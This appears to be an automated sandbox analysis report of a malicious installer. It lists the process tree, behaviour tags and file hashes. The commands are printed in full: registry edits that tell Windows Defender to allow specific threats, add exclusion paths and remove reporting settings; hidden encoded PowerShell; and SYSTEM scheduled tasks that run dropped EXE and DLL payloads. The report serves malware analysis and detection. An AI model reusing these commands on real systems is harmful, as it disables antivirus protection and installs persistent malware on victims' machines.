C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FpvksngNCKIjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FpvksngNCKIjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QqSrWmvdGtwU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QqSrWmvdGtwU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RIuAFuLLU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RIuAFuLLU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cfvymemHCAUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cfvymemHCAUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BekoRFZthbLHeaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BekoRFZthbLHeaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\jUlWXsHGbnJNPdLP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\jUlWXsHGbnJNPdLP\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FpvksngNCKIjC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FpvksngNCKIjC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FpvksngNCKIjC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqSrWmvdGtwU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqSrWmvdGtwU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RIuAFuLLU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RIuAFuLLU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cfvymemHCAUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cfvymemHCAUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BekoRFZthbLHeaVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BekoRFZthbLHeaVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\jUlWXsHGbnJNPdLP /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\jUlWXsHGbnJNPdLP /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxcCBvxEn" /SC once /ST 00:21:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxcCBvxEn"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxcCBvxEn"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cfFFKgQyvKFYWQGgS" /SC once /ST 00:16:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\aTeDbPf.exe\" lH /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cfFFKgQyvKFYWQGgS"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\aTeDbPf.exeC:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\aTeDbPf.exe lH /site_id 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bCfEGNwGDQwhWneLvC"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RIuAFuLLU\qIsntF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qcUOvNLqmSmqpxF" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qcUOvNLqmSmqpxF2" /F /xml "C:\Program Files (x86)\RIuAFuLLU\hWSTyae.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qcUOvNLqmSmqpxF"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qcUOvNLqmSmqpxF"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nCtegvDAmjdVDw" /F /xml "C:\Program Files (x86)\QqSrWmvdGtwU2\qDiwqFm.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VircTphmeRxIj2" /F /xml "C:\ProgramData\BekoRFZthbLHeaVB\rMfVNnD.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BPTpyhbDHEioZHGkr2" /F /xml "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\pGcANWJ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aTjIGRcnJusWUoAznGe2" /F /xml "C:\Program Files (x86)\FpvksngNCKIjC\TfhVTUk.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vdoHbRZAyoFFuVbVu" /SC once /ST 00:29:11 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\jUlWXsHGbnJNPdLP\fCXSDpnC\FTyDXiB.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "vdoHbRZAyoFFuVbVu"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "cfFFKgQyvKFYWQGgS"2⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jUlWXsHGbnJNPdLP\fCXSDpnC\FTyDXiB.dll",#1 /site_id 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jUlWXsHGbnJNPdLP\fCXSDpnC\FTyDXiB.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vdoHbRZAyoFFuVbVu"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\FpvksngNCKIjC\TfhVTUk.xmlFilesize
2KB
MD572c2e86551b289b154762178ee009b40
SHA11d66930eafa8e5edb68475ac7656cf3880886c19
SHA25611b090d0e297dde633d8aa979eb0a2e05cb93a3467b69477aa41b3b6ff77516a
SHA5122cfb6a88f0644715fc4d2fecd83c8a928d9bdd0f81ef4edd6f0515ecb5925ea5844d88fc1debddc5b48845e936035bc9321a448b02776bff65eccf5c08675141
-
C:\Program Files (x86)\QqSrWmvdGtwU2\qDiwqFm.xmlFilesize
2KB
MD59f9035769df5a448a3cb1511ab5d95d0
SHA1389a26a98bff59235c787a3c4c59183a22dad440
SHA256545aab4d21d1f4959ee463994053af9ee874bf6028eba1b052b4ef4b8e892df8
SHA512ecec07e57fa318719edae9816b80c203224ef59cfb44c83ffd3d852fd6d5170da68549a44c297f6f0072bb11e170d2e797ef5f1237515b144bc0eaf47d5d8d98
-
C:\Program Files (x86)\RIuAFuLLU\hWSTyae.xmlFilesize
2KB
MD5f2d5ec2f6e990810394dfe4721dd5a60
SHA1605bd37dacef18fd5015c0e4b9f560f3d219d9ea
SHA256452bb0e0f18ed685e03b77a34c262a3b3ea37f685ba4351ee5aaf6cd95ccd562
SHA512d6eee7458b321a85a65172d52aeafa36d2dc786c6b645771ba11191de0e62c11b7973a599ede1af9aacca9f94665e952996da132e5dca533f96f2fc802e695d1
-
C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\pGcANWJ.xmlFilesize
2KB
MD5469bc0c243879c688ceafc5ce2cda889
SHA1044175e80ba91409c1dfb9aadfc5cf724cace51f
SHA2568f8a14b4bffe16e798af228c09a7296a22c7ede2f8bdddf11d59159cf348ff40
SHA5127b591761cea963df3fb81dfd3f3972215de1cc65e83a3c99b944070d023b004241c2dace5653947d0afd93f6dbd557c77cb614e422e2736c1b0a5bf8b20adec3
-
C:\ProgramData\BekoRFZthbLHeaVB\rMfVNnD.xmlFilesize
2KB
MD59196a47223d7fa5fe6684f328f374ace
SHA1236f9332491bc91bb6616d35b5490e3009098b7e
SHA25662f937088967ecfd2ffce02f1ea20816769a8c4ce6dff2a52abcb035059d5c05
SHA51227e0e614bbf3f9d916963100f9c5f8dfe2887f41f992e27ec145b7efb1af09727a2751328214718c1409e90407ef3d203e676cc1ed6eee14c5b4f0b4fa0053e0
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
C:\Users\Admin\AppData\Local\Temp\7zS9CF0.tmp\Install.exeFilesize
6.2MB
MD57dc21db165675d7494f9c528235c1f2f
SHA100f04ee80c3e19d22c4a224f7aeb95ddf69571cc
SHA256a5b2ab287d56c737ca5ffaf39dfd9345f91b88706dffee4e00dda8f48dff278b
SHA512ec99a73032ece6733aae86e90eefcc184c694e5bf75e0b70776b63f616d8edf23e3532547fee30be6cfb0cb4fdbdc1635c8e7e5996c2c3b93e2025247d57706d
-
C:\Users\Admin\AppData\Local\Temp\7zS9CF0.tmp\Install.exeFilesize
6.2MB
MD57dc21db165675d7494f9c528235c1f2f
SHA100f04ee80c3e19d22c4a224f7aeb95ddf69571cc
SHA256a5b2ab287d56c737ca5ffaf39dfd9345f91b88706dffee4e00dda8f48dff278b
